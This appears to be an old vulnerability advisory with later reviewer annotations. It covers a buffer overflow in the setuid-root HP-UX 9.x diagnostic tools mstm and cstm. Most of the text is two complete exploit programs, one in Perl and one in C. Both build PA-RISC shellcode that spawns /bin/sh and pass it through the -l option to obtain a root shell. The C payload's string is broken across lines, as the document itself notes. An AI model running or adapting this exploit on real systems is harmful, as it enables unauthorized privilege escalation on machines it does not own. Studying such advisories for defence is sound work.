COMMAND

    /usr/diag/bin/mstm, /usr/diag/bin/cstm

SYSTEMS AFFECTED

    HP 9.X (10.X untested / unconfirmed)

PROBLEM

    The following two scripts trigger a buffer overrun in two very similar
    setuid-root programs in /usr/diag/bin, mstm and cstm, by passing an
    over-long argument to their -l option.  One script is Perl, the other
    is C.

    --- stmo.pl ---
    #!/usr/bin/perl

    # working exploit for 9.X setuid root /usr/diag/bin/[cm]stm

    use FileHandle;

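    # h2cs: decode a string of hex digit pairs ("34010102") into the raw
    # bytes they denote ("\x34\x01\x01\x02").  Used below to turn the
    # hex-encoded instruction words and trailer into a byte string.
    #
    # Returns the decoded bytes.  Dies on an odd-length input or on a
    # non-hex character: the original two-chars-at-a-time loop never
    # consumed a trailing lone digit and so spun forever, and decoded a
    # bad digit pair as 0 without complaint.
    sub h2cs {
        my ($hex) = @_;
        die "h2cs: odd-length hex string '$hex'\n" if length($hex) % 2;
        die "h2cs: non-hex character in '$hex'\n"
            unless $hex =~ /\A[0-9a-fA-F]*\z/;
        return pack("H*", $hex);
    }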

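    # Build the over-long "-l" argument: a 208-byte code area, a 16-byte
    # data area and a 4-byte trailer word (the original does not say what
    # the trailer is; NOTE(review): presumably the value that overwrites
    # the saved return pointer -- confirm).  Hex words and mnemonics are
    # exactly those of the original; lines starting with '#' are
    # alternatives the original author left disabled.
    my $code = "AA";                       # two byte alignment

    $code .= h2cs("34010102");             # ldi 129,r1
    $code .= h2cs("08220401");             # sub rp,r1,r1
    $code .= h2cs("602002a6");             # stb r0,339(r1)
    #$code .= h2cs("602002ac");            # stb r0,342(r1)  (disabled)
    $code .= h2cs("b43a0298");             # addi 332,r1,arg0
    $code .= h2cs("34160176");             # ldi 187,r22
    $code .= h2cs("34010276");             # ldi 315,r1
    $code .= h2cs("08360216");             # and r22,r1,r22
    $code .= h2cs("20200801");             # ldil l%c0000004,r1
    $code .= h2cs("e420e008");             # ble 4(sr7,r1)
    $code .= h2cs("08210280");             # NOP == xor r1,r1,r0
    #$code .= h2cs("deadcafe");            # illegal instruction (disabled)

    # Pad each area out to its fixed size.  "x" with a negative count
    # yields "" silently, which would quietly shift everything after it,
    # so refuse an oversized area instead of emitting a mis-laid-out string.
    my $code_len = 208;
    die "code area is longer than $code_len bytes\n"
        if length($code) > $code_len;
    $code .= "C" x ($code_len - length($code));

    my $data = "/bin/sh.sh.";
    my $data_len = 16;
    die "data area is longer than $data_len bytes\n"
        if length($data) > $data_len;
    $data .= "D" x ($data_len - length($data));

    # The original also computed 224-length($of) here, before $of was
    # assigned, and never used the result; that dead line is dropped.
    my $of = $code . $data . h2cs("7b03301B");
    print "Length is: ", length($of), "\n";

    # exec() only returns if the exec itself failed.
    exec("/usr/diag/bin/mstm", "-l", $of)
        or die "exec /usr/diag/bin/mstm: $!\n";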

    --- stmo.c ---
    /* SOD /usr/diag/bin/[cm]stm buffer overflow */

    /* Builds an over-long "-l" argument of the same shape as stmo.pl and
     * hands it to mstm, then (only if that exec fails) to cstm.  The byte
     * string is not identical to the Perl payload: it includes the
     * "stb r0,342(r1)" word (60 20 02 ac) that the Perl leaves disabled,
     * carries an extra NOP word (08 21 02 80) between the "and" and the
     * "ldil", and its data area reads "/bin/sh.-i." where the Perl uses
     * "/bin/sh.sh.".
     *
     * NOTE(review): reproduced as posted.  main() has no return type and
     * there are no #include lines for strcpy()/execl(); the string
     * literal below also appears to have been wrapped across several
     * lines by the page, and would not compile as shown. */
    main()
    {
    char buf[500];   /* the literal copied in is well under 500 bytes */

strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x4
3\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x
43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\
x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");

    /* execl() returns only on failure, so the second call is reached
     * only when the mstm exec failed.  Neither return value is checked. */
    execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
    /* Either-or, same overflow */
    execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
    }